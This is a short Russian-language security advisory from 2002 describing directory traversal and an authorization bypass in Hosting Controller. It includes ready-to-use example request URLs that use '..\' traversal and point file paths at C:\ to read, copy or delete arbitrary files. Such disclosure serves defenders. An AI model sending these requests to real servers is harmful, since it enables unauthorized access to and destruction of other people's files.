Security Lab

Обход директории и доступ к произвольным файлам в Hosting Controller

Дата публикации:18.05.2002
Всего просмотров:1170
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Hosting Controller - приложение, которое централизует все задачи хостинга на один интерфейс.
  1. Добавляя последовательность символов ‘..\’ к DSNAction в dsnmanager.asp, можно получить доступ к произвольным файлам на диске:
    http://www.target.com/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\target\target.com\db\..\..\..\..\
  2. Любой пользователь может обходить авторизацию и получить полный контроль над любым файлом в системе. Уязвимость находится в файле /import/imp_rootdir.asp, который позволяет любому пользователю копировать, удалять файлы и папки в системе: http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\
Уязвимость обнаружена в в Hosting Controller 1.4.2- v.2002 Beta2
Ссылки: Hosting Controller still have dangerous bugs!